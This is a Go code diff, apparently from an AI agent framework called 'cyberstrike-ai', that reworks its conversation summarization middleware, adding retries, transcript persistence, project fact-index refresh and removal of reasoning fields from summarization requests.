|
||||||
executor, err := newPlanExecuteExecutor(ctx, &planexecute.ExecutorConfig{
|
executor, err := newPlanExecuteExecutor(ctx, &planexecute.ExecutorConfig{
|
||||||
Model: a.ExecModel,
|
Model: a.ExecModel,
|
||||||
|
|||||||
@@ -11,6 +11,7 @@ import (
|
|||||||
|
|
||||||
"cyberstrike-ai/internal/agent"
|
"cyberstrike-ai/internal/agent"
|
||||||
"cyberstrike-ai/internal/config"
|
"cyberstrike-ai/internal/config"
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
"cyberstrike-ai/internal/einomcp"
|
"cyberstrike-ai/internal/einomcp"
|
||||||
"cyberstrike-ai/internal/openai"
|
"cyberstrike-ai/internal/openai"
|
||||||
"cyberstrike-ai/internal/project"
|
"cyberstrike-ai/internal/project"
|
||||||
@@ -32,8 +33,10 @@ func RunEinoSingleChatModelAgent(
|
|||||||
appCfg *config.Config,
|
appCfg *config.Config,
|
||||||
ma *config.MultiAgentConfig,
|
ma *config.MultiAgentConfig,
|
||||||
ag *agent.Agent,
|
ag *agent.Agent,
|
||||||
|
db *database.DB,
|
||||||
logger *zap.Logger,
|
logger *zap.Logger,
|
||||||
conversationID string,
|
conversationID string,
|
||||||
|
projectID string,
|
||||||
userMessage string,
|
userMessage string,
|
||||||
history []agent.ChatMessage,
|
history []agent.ChatMessage,
|
||||||
roleTools []string,
|
roleTools []string,
|
||||||
@@ -58,10 +61,12 @@ func RunEinoSingleChatModelAgent(
|
|||||||
|
|
||||||
var mcpIDsMu sync.Mutex
|
var mcpIDsMu sync.Mutex
|
||||||
var mcpIDs []string
|
var mcpIDs []string
|
||||||
recorder := func(id string) {
|
mcpExecBinder := NewMCPExecutionBinder()
|
||||||
|
recorder := func(id, toolCallID string) {
|
||||||
if id == "" {
|
if id == "" {
|
||||||
return
|
return
|
||||||
}
|
}
|
||||||
|
mcpExecBinder.Bind(toolCallID, id)
|
||||||
mcpIDsMu.Lock()
|
mcpIDsMu.Lock()
|
||||||
mcpIDs = append(mcpIDs, id)
|
mcpIDs = append(mcpIDs, id)
|
||||||
mcpIDsMu.Unlock()
|
mcpIDsMu.Unlock()
|
||||||
@@ -75,29 +80,15 @@ func RunEinoSingleChatModelAgent(
|
|||||||
return out
|
return out
|
||||||
}
|
}
|
||||||
|
|
||||||
toolOutputChunk := func(toolName, toolCallID, chunk string) {
|
|
||||||
if progress == nil || toolCallID == "" {
|
|
||||||
return
|
|
||||||
}
|
|
||||||
progress("tool_result_delta", chunk, map[string]interface{}{
|
|
||||||
"toolName": toolName,
|
|
||||||
"toolCallId": toolCallID,
|
|
||||||
"index": 0,
|
|
||||||
"total": 0,
|
|
||||||
"iteration": 0,
|
|
||||||
"source": "eino",
|
|
||||||
})
|
|
||||||
}
|
|
||||||
|
|
||||||
toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder()
|
toolInvokeNotify := einomcp.NewToolInvokeNotifyHolder()
|
||||||
einoExecMonitor := newEinoExecuteMonitorCallback(ag, recorder)
|
einoExecMonitor := newEinoExecuteMonitorCallback(ag, recorder)
|
||||||
mainDefs := ag.ToolsForRole(roleTools)
|
mainDefs := ag.ToolsForRole(roleTools)
|
||||||
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, toolOutputChunk, toolInvokeNotify, einoSingleAgentName)
|
mainTools, err := einomcp.ToolsFromDefinitions(ag, holder, mainDefs, recorder, nil, toolInvokeNotify, einoSingleAgentName)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, err
|
return nil, err
|
||||||
}
|
}
|
||||||
|
|
||||||
mainToolsForCfg, mainOrchestratorPre, singleToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, logger)
|
mainToolsForCfg, mainOrchestratorPre, singleToolSearchActive, err := prependEinoMiddlewares(ctx, &ma.EinoMiddleware, einoMWMain, mainTools, einoLoc, skillsRoot, conversationID, projectID, logger)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("eino single eino 中间件: %w", err)
|
return nil, fmt.Errorf("eino single eino 中间件: %w", err)
|
||||||
}
|
}
|
||||||
@@ -117,6 +108,7 @@ func RunEinoSingleChatModelAgent(
|
|||||||
},
|
},
|
||||||
}
|
}
|
||||||
httpClient = openai.NewEinoHTTPClient(&appCfg.OpenAI, httpClient)
|
httpClient = openai.NewEinoHTTPClient(&appCfg.OpenAI, httpClient)
|
||||||
|
openai.AttachSummarizationDiagTransport(httpClient, logger)
|
||||||
|
|
||||||
baseModelCfg := &einoopenai.ChatModelConfig{
|
baseModelCfg := &einoopenai.ChatModelConfig{
|
||||||
APIKey: appCfg.OpenAI.APIKey,
|
APIKey: appCfg.OpenAI.APIKey,
|
||||||
@@ -131,7 +123,7 @@ func RunEinoSingleChatModelAgent(
|
|||||||
return nil, fmt.Errorf("eino single 模型: %w", err)
|
return nil, fmt.Errorf("eino single 模型: %w", err)
|
||||||
}
|
}
|
||||||
|
|
||||||
mainSumMw, err := newEinoSummarizationMiddleware(ctx, mainModel, appCfg, &ma.EinoMiddleware, conversationID, logger)
|
mainSumMw, err := newEinoSummarizationMiddleware(ctx, mainModel, appCfg, &ma.EinoMiddleware, conversationID, db, projectID, logger)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
return nil, fmt.Errorf("eino single summarization: %w", err)
|
return nil, fmt.Errorf("eino single summarization: %w", err)
|
||||||
}
|
}
|
||||||
@@ -144,7 +136,7 @@ func RunEinoSingleChatModelAgent(
|
|||||||
}
|
}
|
||||||
if einoSkillMW != nil {
|
if einoSkillMW != nil {
|
||||||
if einoFSTools && einoLoc != nil {
|
if einoFSTools && einoLoc != nil {
|
||||||
fsMw, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, einoSingleAgentName, einoExecMonitor, agentToolTimeoutMinutes(appCfg), toolOutputChunk)
|
fsMw, fsErr := subAgentFilesystemMiddleware(ctx, einoLoc, toolInvokeNotify, einoSingleAgentName, einoExecMonitor, agentToolTimeoutMinutes(appCfg), nil)
|
||||||
if fsErr != nil {
|
if fsErr != nil {
|
||||||
return nil, fmt.Errorf("eino single filesystem 中间件: %w", fsErr)
|
return nil, fmt.Errorf("eino single filesystem 中间件: %w", fsErr)
|
||||||
}
|
}
|
||||||
@@ -152,21 +144,16 @@ func RunEinoSingleChatModelAgent(
|
|||||||
}
|
}
|
||||||
handlers = append(handlers, einoSkillMW)
|
handlers = append(handlers, einoSkillMW)
|
||||||
}
|
}
|
||||||
handlers = append(handlers, mainSumMw)
|
handlers = appendEinoChatModelTailMiddlewares(handlers, einoChatModelTailConfig{
|
||||||
if teleMw := newEinoModelInputTelemetryMiddleware(logger, appCfg.OpenAI.Model, conversationID, "eino_single"); teleMw != nil {
|
logger: logger,
|
||||||
handlers = append(handlers, teleMw)
|
phase: "eino_single",
|
||||||
}
|
summarization: mainSumMw,
|
||||||
if capMw := newModelFacingTraceMiddleware(modelFacingTrace); capMw != nil {
|
modelName: appCfg.OpenAI.Model,
|
||||||
handlers = append(handlers, capMw)
|
conversationID: conversationID,
|
||||||
}
|
trace: modelFacingTrace,
|
||||||
|
})
|
||||||
|
|
||||||
maxIter := ma.MaxIteration
|
maxIter := agentMaxIterations(appCfg)
|
||||||
if maxIter <= 0 {
|
|
||||||
maxIter = appCfg.Agent.MaxIterations
|
|
||||||
}
|
|
||||||
if maxIter <= 0 {
|
|
||||||
maxIter = 40
|
|
||||||
}
|
|
||||||
|
|
||||||
mainToolsCfg := adk.ToolsConfig{
|
mainToolsCfg := adk.ToolsConfig{
|
||||||
ToolsNodeConfig: compose.ToolsNodeConfig{
|
ToolsNodeConfig: compose.ToolsNodeConfig{
|
||||||
@@ -202,13 +189,10 @@ func RunEinoSingleChatModelAgent(
|
|||||||
MaxIterations: maxIter,
|
MaxIterations: maxIter,
|
||||||
Handlers: handlers,
|
Handlers: handlers,
|
||||||
}
|
}
|
||||||
outKey, modelRetry, _ := deepExtrasFromConfig(ma)
|
outKey, _ := deepExtrasFromConfig(ma)
|
||||||
if outKey != "" {
|
if outKey != "" {
|
||||||
chatCfg.OutputKey = outKey
|
chatCfg.OutputKey = outKey
|
||||||
}
|
}
|
||||||
if modelRetry != nil {
|
|
||||||
chatCfg.ModelRetryConfig = modelRetry
|
|
||||||
}
|
|
||||||
|
|
||||||
chatAgent, err := adk.NewChatModelAgent(ctx, chatCfg)
|
chatAgent, err := adk.NewChatModelAgent(ctx, chatCfg)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
@@ -242,6 +226,7 @@ func RunEinoSingleChatModelAgent(
|
|||||||
McpIDs: &mcpIDs,
|
McpIDs: &mcpIDs,
|
||||||
FilesystemMonitorAgent: ag,
|
FilesystemMonitorAgent: ag,
|
||||||
FilesystemMonitorRecord: recorder,
|
FilesystemMonitorRecord: recorder,
|
||||||
|
MCPExecutionBinder: mcpExecBinder,
|
||||||
ToolInvokeNotify: toolInvokeNotify,
|
ToolInvokeNotify: toolInvokeNotify,
|
||||||
DA: chatAgent,
|
DA: chatAgent,
|
||||||
ModelFacingTrace: modelFacingTrace,
|
ModelFacingTrace: modelFacingTrace,
|
||||||
|
|||||||
@@ -81,7 +81,7 @@ func subAgentFilesystemMiddleware(
|
|||||||
loc *localbk.Local,
|
loc *localbk.Local,
|
||||||
invokeNotify *einomcp.ToolInvokeNotifyHolder,
|
invokeNotify *einomcp.ToolInvokeNotifyHolder,
|
||||||
einoAgentName string,
|
einoAgentName string,
|
||||||
recordMonitor func(command, stdout string, success bool, invokeErr error),
|
recordMonitor func(toolCallID, command, stdout string, success bool, invokeErr error),
|
||||||
toolTimeoutMinutes int,
|
toolTimeoutMinutes int,
|
||||||
outputChunk func(toolName, toolCallID, chunk string),
|
outputChunk func(toolName, toolCallID, chunk string),
|
||||||
) (adk.ChatModelAgentMiddleware, error) {
|
) (adk.ChatModelAgentMiddleware, error) {
|
||||||
|
|||||||
@@ -9,12 +9,16 @@ import (
|
|||||||
|
|
||||||
"cyberstrike-ai/internal/agent"
|
"cyberstrike-ai/internal/agent"
|
||||||
"cyberstrike-ai/internal/config"
|
"cyberstrike-ai/internal/config"
|
||||||
|
"cyberstrike-ai/internal/database"
|
||||||
|
copenai "cyberstrike-ai/internal/openai"
|
||||||
|
"cyberstrike-ai/internal/project"
|
||||||
|
|
||||||
"github.com/bytedance/sonic"
|
"github.com/bytedance/sonic"
|
||||||
"github.com/cloudwego/eino/adk"
|
"github.com/cloudwego/eino/adk"
|
||||||
"github.com/cloudwego/eino/adk/middlewares/summarization"
|
"github.com/cloudwego/eino/adk/middlewares/summarization"
|
||||||
"github.com/cloudwego/eino/components/model"
|
"github.com/cloudwego/eino/components/model"
|
||||||
"github.com/cloudwego/eino/schema"
|
"github.com/cloudwego/eino/schema"
|
||||||
|
einoopenai "github.com/cloudwego/eino-ext/components/model/openai"
|
||||||
"go.uber.org/zap"
|
"go.uber.org/zap"
|
||||||
)
|
)
|
||||||
|
|
||||||
@@ -36,6 +40,8 @@ func newEinoSummarizationMiddleware(
|
|||||||
appCfg *config.Config,
|
appCfg *config.Config,
|
||||||
mwCfg *config.MultiAgentEinoMiddlewareConfig,
|
mwCfg *config.MultiAgentEinoMiddlewareConfig,
|
||||||
conversationID string,
|
conversationID string,
|
||||||
|
db *database.DB,
|
||||||
|
projectID string,
|
||||||
logger *zap.Logger,
|
logger *zap.Logger,
|
||||||
) (adk.ChatModelAgentMiddleware, error) {
|
) (adk.ChatModelAgentMiddleware, error) {
|
||||||
if summaryModel == nil || appCfg == nil {
|
if summaryModel == nil || appCfg == nil {
|
||||||
@@ -89,8 +95,30 @@ func newEinoSummarizationMiddleware(
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
retryPolicy := einoTransientRunRetryPolicyFromMW(mwCfg)
|
||||||
|
retryMax := retryPolicy.maxAttempts
|
||||||
|
|
||||||
|
// ModelOptions apply only to summarization Generate (same ChatModel instance as the agent).
|
||||||
|
// Strip thinking/reasoning on this call path; mark requests for empty-choices diagnostics.
|
||||||
|
summaryModelOpts := []model.Option{
|
||||||
|
einoopenai.WithExtraHeader(map[string]string{
|
||||||
|
copenai.SummarizationRequestHeader: "1",
|
||||||
|
}),
|
||||||
|
einoopenai.WithRequestPayloadModifier(func(_ context.Context, in []*schema.Message, rawBody []byte) ([]byte, error) {
|
||||||
|
if logger != nil {
|
||||||
|
logger.Info("eino summarization generate request",
|
||||||
|
zap.Int("input_messages", len(in)),
|
||||||
|
zap.Int("payload_bytes", len(rawBody)),
|
||||||
|
zap.String("model", modelName),
|
||||||
|
)
|
||||||
|
}
|
||||||
|
return stripReasoningFromSummarizationPayload(rawBody)
|
||||||
|
}),
|
||||||
|
}
|
||||||
|
|
||||||
mw, err := summarization.New(ctx, &summarization.Config{
|
mw, err := summarization.New(ctx, &summarization.Config{
|
||||||
Model: summaryModel,
|
Model: summaryModel,
|
||||||
|
ModelOptions: summaryModelOpts,
|
||||||
Trigger: &summarization.TriggerCondition{
|
Trigger: &summarization.TriggerCondition{
|
||||||
ContextTokens: trigger,
|
ContextTokens: trigger,
|
||||||
},
|
},
|
||||||
@@ -102,24 +130,51 @@ func newEinoSummarizationMiddleware(
|
|||||||
Enabled: true,
|
Enabled: true,
|
||||||
MaxTokens: preserveMax,
|
MaxTokens: preserveMax,
|
||||||
},
|
},
|
||||||
|
Retry: &summarization.RetryConfig{
|
||||||
|
MaxRetries: &retryMax,
|
||||||
|
ShouldRetry: func(_ context.Context, _ adk.Message, err error) bool {
|
||||||
|
retry := isEinoTransientRunError(err)
|
||||||
|
if retry && logger != nil {
|
||||||
|
logger.Warn("eino summarization generate transient error, will retry if attempts remain",
|
||||||
|
zap.Error(err),
|
||||||
|
zap.Int("max_retries", retryMax),
|
||||||
|
)
|
||||||
|
}
|
||||||
|
return retry
|
||||||
|
},
|
||||||
|
},
|
||||||
Finalize: func(ctx context.Context, originalMessages []adk.Message, summary adk.Message) ([]adk.Message, error) {
|
Finalize: func(ctx context.Context, originalMessages []adk.Message, summary adk.Message) ([]adk.Message, error) {
|
||||||
return summarizeFinalizeWithRecentAssistantToolTrail(ctx, originalMessages, summary, tokenCounter, recentTrailMax)
|
out, ferr := summarizeFinalizeWithRecentAssistantToolTrail(ctx, originalMessages, summary, tokenCounter, recentTrailMax)
|
||||||
|
if ferr != nil {
|
||||||
|
return nil, ferr
|
||||||
|
}
|
||||||
|
if appCfg != nil {
|
||||||
|
out = refreshFactIndexInMessages(out, db, projectID, appCfg.Project, logger)
|
||||||
|
}
|
||||||
|
return out, nil
|
||||||
},
|
},
|
||||||
Callback: func(ctx context.Context, before, after adk.ChatModelAgentState) error {
|
Callback: func(ctx context.Context, before, after adk.ChatModelAgentState) error {
|
||||||
if logger == nil {
|
if transcriptPath != "" && len(before.Messages) > 0 {
|
||||||
return nil
|
if werr := writeSummarizationTranscript(transcriptPath, before.Messages); werr != nil && logger != nil {
|
||||||
|
logger.Warn("eino summarization transcript 写入失败",
|
||||||
|
zap.String("path", transcriptPath),
|
||||||
|
zap.Error(werr),
|
||||||
|
)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if logger != nil {
|
||||||
|
beforeTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: before.Messages})
|
||||||
|
afterTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: after.Messages})
|
||||||
|
logger.Info("eino summarization 已压缩上下文",
|
||||||
|
zap.Int("messages_before", len(before.Messages)),
|
||||||
|
zap.Int("messages_after", len(after.Messages)),
|
||||||
|
zap.Int("tokens_before_estimated", beforeTokens),
|
||||||
|
zap.Int("tokens_after_estimated", afterTokens),
|
||||||
|
zap.Int("max_total_tokens", maxTotal),
|
||||||
|
zap.Int("trigger_context_tokens", trigger),
|
||||||
|
zap.String("transcript_file", transcriptPath),
|
||||||
|
)
|
||||||
}
|
}
|
||||||
beforeTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: before.Messages})
|
|
||||||
afterTokens, _ := tokenCounter(ctx, &summarization.TokenCounterInput{Messages: after.Messages})
|
|
||||||
logger.Info("eino summarization 已压缩上下文",
|
|
||||||
zap.Int("messages_before", len(before.Messages)),
|
|
||||||
zap.Int("messages_after", len(after.Messages)),
|
|
||||||
zap.Int("tokens_before_estimated", beforeTokens),
|
|
||||||
zap.Int("tokens_after_estimated", afterTokens),
|
|
||||||
zap.Int("max_total_tokens", maxTotal),
|
|
||||||
zap.Int("trigger_context_tokens", trigger),
|
|
||||||
zap.String("transcript_file", transcriptPath),
|
|
||||||
)
|
|
||||||
return nil
|
return nil
|
||||||
},
|
},
|
||||||
})
|
})
|
||||||
@@ -129,6 +184,50 @@ func newEinoSummarizationMiddleware(
|
|||||||
return mw, nil
|
return mw, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// refreshFactIndexInMessages 在 summarization 压缩后,用 DB 最新索引替换 system 中已有的项目黑板索引段。
|
||||||
|
func refreshFactIndexInMessages(msgs []adk.Message, db *database.DB, projectID string, cfg config.ProjectConfig, logger *zap.Logger) []adk.Message {
|
||||||
|
if db == nil || !cfg.Enabled {
|
||||||
|
return msgs
|
||||||
|
}
|
||||||
|
projectID = strings.TrimSpace(projectID)
|
||||||
|
if projectID == "" {
|
||||||
|
return msgs
|
||||||
|
}
|
||||||
|
freshIndex, err := project.BuildFactIndexBlock(db, projectID, cfg)
|
||||||
|
if err != nil {
|
||||||
|
if logger != nil {
|
||||||
|
logger.Warn("summarization: 刷新项目黑板索引失败", zap.String("projectId", projectID), zap.Error(err))
|
||||||
|
}
|
||||||
|
return msgs
|
||||||
|
}
|
||||||
|
freshIndex = strings.TrimSpace(freshIndex)
|
||||||
|
if freshIndex == "" {
|
||||||
|
return msgs
|
||||||
|
}
|
||||||
|
|
||||||
|
changed := false
|
||||||
|
out := make([]adk.Message, len(msgs))
|
||||||
|
for i, msg := range msgs {
|
||||||
|
if msg == nil || msg.Role != schema.System {
|
||||||
|
out[i] = msg
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
newContent, ok := project.ReplaceFactIndexSection(msg.Content, freshIndex)
|
||||||
|
if !ok {
|
||||||
|
out[i] = msg
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
cloned := *msg
|
||||||
|
cloned.Content = newContent
|
||||||
|
out[i] = &cloned
|
||||||
|
changed = true
|
||||||
|
}
|
||||||
|
if changed && logger != nil {
|
||||||
|
logger.Info("summarization: 已刷新项目黑板索引", zap.String("projectId", projectID))
|
||||||
|
}
|
||||||
|
return out
|
||||||
|
}
|
||||||
|
|
||||||
// summarizeFinalizeWithRecentAssistantToolTrail 在摘要消息后保留最近 assistant/tool 轨迹,避免压缩后执行链断裂。
|
// summarizeFinalizeWithRecentAssistantToolTrail 在摘要消息后保留最近 assistant/tool 轨迹,避免压缩后执行链断裂。
|
||||||
//
|
//
|
||||||
// 关键不变量:tool_call ↔ tool_result 的 pair 必须整体保留或整体丢弃。
|
// 关键不变量:tool_call ↔ tool_result 的 pair 必须整体保留或整体丢弃。
|
||||||
@@ -158,17 +257,19 @@ func summarizeFinalizeWithRecentAssistantToolTrail(
|
|||||||
nonSystem = append(nonSystem, msg)
|
nonSystem = append(nonSystem, msg)
|
||||||
}
|
}
|
||||||
|
|
||||||
|
mergedSystem := mergeCollectedSystemMessages(systemMsgs)
|
||||||
|
|
||||||
if recentTrailTokenBudget <= 0 || len(nonSystem) == 0 {
|
if recentTrailTokenBudget <= 0 || len(nonSystem) == 0 {
|
||||||
out := make([]adk.Message, 0, len(systemMsgs)+1)
|
out := make([]adk.Message, 0, len(mergedSystem)+1)
|
||||||
out = append(out, systemMsgs...)
|
out = append(out, mergedSystem...)
|
||||||
out = append(out, summary)
|
out = append(out, summary)
|
||||||
return out, nil
|
return out, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
rounds := splitMessagesIntoRounds(nonSystem)
|
rounds := splitMessagesIntoRounds(nonSystem)
|
||||||
if len(rounds) == 0 {
|
if len(rounds) == 0 {
|
||||||
out := make([]adk.Message, 0, len(systemMsgs)+1)
|
out := make([]adk.Message, 0, len(mergedSystem)+1)
|
||||||
out = append(out, systemMsgs...)
|
out = append(out, mergedSystem...)
|
||||||
out = append(out, summary)
|
out = append(out, summary)
|
||||||
return out, nil
|
return out, nil
|
||||||
}
|
}
|
||||||
@@ -220,8 +321,8 @@ func summarizeFinalizeWithRecentAssistantToolTrail(
|
|||||||
selectedMsgs = append(selectedMsgs, selectedRoundsReverse[i].messages...)
|
selectedMsgs = append(selectedMsgs, selectedRoundsReverse[i].messages...)
|
||||||
}
|
}
|
||||||
|
|
||||||
out := make([]adk.Message, 0, len(systemMsgs)+1+len(selectedMsgs))
|
out := make([]adk.Message, 0, len(mergedSystem)+1+len(selectedMsgs))
|
||||||
out = append(out, systemMsgs...)
|
out = append(out, mergedSystem...)
|
||||||
out = append(out, summary)
|
out = append(out, summary)
|
||||||
out = append(out, selectedMsgs...)
|
out = append(out, selectedMsgs...)
|
||||||
return out, nil
|
return out, nil
|
||||||
@@ -295,6 +396,23 @@ func splitMessagesIntoRounds(msgs []adk.Message) []messageRound {
|
|||||||
return rounds
|
return rounds
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// writeSummarizationTranscript persists pre-compaction history for read_file after summarization.
|
||||||
|
// Eino TranscriptFilePath only embeds the path in summary text; the file must be written by the host app.
|
||||||
|
func writeSummarizationTranscript(path string, msgs []adk.Message) error {
|
||||||
|
path = strings.TrimSpace(path)
|
||||||
|
if path == "" {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
body := formatSummarizationTranscript(msgs)
|
||||||
|
if err := os.MkdirAll(filepath.Dir(path), 0o755); err != nil {
|
||||||
|
return fmt.Errorf("mkdir transcript dir: %w", err)
|
||||||
|
}
|
||||||
|
if err := os.WriteFile(path, []byte(body), 0o600); err != nil {
|
||||||
|
return fmt.Errorf("write transcript: %w", err)
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
func einoSummarizationTokenCounter(openAIModel string) summarization.TokenCounterFunc {
|
func einoSummarizationTokenCounter(openAIModel string) summarization.TokenCounterFunc {
|
||||||
tc := agent.NewTikTokenCounter()
|
tc := agent.NewTikTokenCounter()
|
||||||
return func(ctx context.Context, input *summarization.TokenCounterInput) (int, error) {
|
return func(ctx context.Context, input *summarization.TokenCounterInput) (int, error) {
|
||||||
|
|||||||
@@ -0,0 +1,35 @@
|
|||||||
|
package multiagent
|
||||||
|
|
||||||
|
import (
|
||||||
|
"github.com/bytedance/sonic"
|
||||||
|
)
|
||||||
|
|
||||||
|
// stripReasoningFromSummarizationPayload removes thinking / reasoning fields from a
|
||||||
|
// chat-completions JSON body. Applied only to summarization Generate calls via
|
||||||
|
// model.ModelOptions on the shared ChatModel — main-agent requests are unchanged.
|
||||||
|
func stripReasoningFromSummarizationPayload(rawBody []byte) ([]byte, error) {
|
||||||
|
var payload map[string]any
|
||||||
|
if err := sonic.Unmarshal(rawBody, &payload); err != nil {
|
||||||
|
return rawBody, nil
|
||||||
|
}
|
||||||
|
changed := false
|
||||||
|
for _, key := range []string{
|
||||||
|
"thinking",
|
||||||
|
"reasoning_effort",
|
||||||
|
"output_config",
|
||||||
|
"reasoning",
|
||||||
|
} {
|
||||||
|
if _, ok := payload[key]; ok {
|
||||||
|
delete(payload, key)
|
||||||
|
changed = true
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if !changed {
|
||||||
|
return rawBody, nil
|
||||||
|
}
|
||||||
|
out, err := sonic.Marshal(payload)
|
||||||
|
if err != nil {
|
||||||
|
return rawBody, err
|
||||||
|
}
|
||||||
|
return out, nil
|
||||||
|
}
|
||||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user